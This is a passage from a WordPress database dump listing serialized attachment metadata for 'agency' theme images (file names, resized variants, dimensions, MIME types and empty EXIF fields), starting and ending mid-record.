\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-09-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-09-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-09-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-09-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"agency-09-980x500.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-09-480x245.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(212,96,'_wp_attached_file','2020/06/agency-08.jpg'),(213,96,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:389;s:4:\"file\";s:21:\"2020/06/agency-08.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-08-300x292.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:292;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-08-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-08-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-08-400x382.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(214,97,'_wp_attached_file','2020/06/agency-07.jpg'),(215,97,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:4:\"file\";s:21:\"2020/06/agency-07.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-07-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"agency-07-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"agency-07-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"agency-07-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-07-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"agency-07-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-07-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-07-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:22:\"agency-07-1080x720.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-07-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:22:\"agency-07-1280x853.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"agency-07-980x653.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-07-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(216,98,'_wp_attached_file','2020/06/agency-10.jpg'),(217,98,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:1010;s:4:\"file\";s:21:\"2020/06/agency-10.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-10-238x300.jpg\";s:5:\"width\";i:238;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"agency-10-768x970.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:970;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-10-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:21:\"agency-10-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-10-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-10-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-10-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-10-480x606.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:606;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(218,99,'_wp_attached_file','2020/06/agency-03.jpg'),(219,99,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:786;s:4:\"file\";s:21:\"2020/06/agency-03.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-03-300x218.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"agency-03-1024x745.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:745;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"agency-03-768x559.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-03-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"agency-03-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-03-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-03-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-03-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"agency-03-980x713.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:713;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-03-480x349.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(220,100,'_wp_attached_file','2020/06/agency-04.jpg'),(221,100,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:786;s:4:\"file\";s:21:\"2020/06/agency-04.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-04-300x218.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"agency-04-1024x745.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:745;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"agency-04-768x559.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-04-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"agency-04-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-04-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-04-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-04-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"agency-04-980x713.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:713;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-04-480x349.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(222,101,'_wp_attached_file','2020/06/agency-19.jpg'),(223,101,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:786;s:4:\"file\";s:21:\"2020/06/agency-19.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-19-300x218.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"agency-19-1024x745.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:745;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"agency-19-768x559.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-19-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"agency-19-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-19-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-19-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-19-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"agency-19-980x713.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:713;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-19-480x349.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(224,102,'_wp_attached_file','2020/06/agency-18.jpg'),(225,102,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:786;s:4:\"file\";s:21:\"2020/06/agency-18.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-18-300x218.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"agency-18-1024x745.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:745;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"agency-18-768x559.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-18-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"agency-18-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-18-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-18-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-18-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"agency-18-980x713.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:713;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-18-480x349.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(226,103,'_wp_attached_file','2020/06/agency-05.png'),(227,103,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2020/06/agency-05.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-05-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-05-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-05-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-05-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-05-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-05-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(228,104,'_wp_attached_file','2020/06/agency-13.png'),(229,104,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2020/06/agency-13.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-13-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-13-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-13-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-13-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-13-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-13-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(230,105,'_wp_attached_file','2020/06/agency-06.png'),(231,105,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2020/06/agency-06.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-06-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"agency-06-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"agency-06-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"agency-06-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"agency-06-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"agency-06-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(266,121,'_wp_attached_file','2020/07/circle-background-pattern.png'),(267,121,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:848;s:4:\"file\";s:37:\"2020/07/circle-background-pattern.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"circle-background-pattern-300x133.png\";s:5:\"width\";i:300;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"circle-background-pattern-1024x452.png\";s:5:\"width\";i:1024;s:6:\"height\";i:452;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"circle-background-pattern-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"circle-background-pattern-768x339.png\";s:5:\"width\";i:768;s:6:\"height\";i:339;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:38:\"circle-background-pattern-1536x678.png\";s:5:\"width\";i:1536;s:6:\"height\";i:678;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"f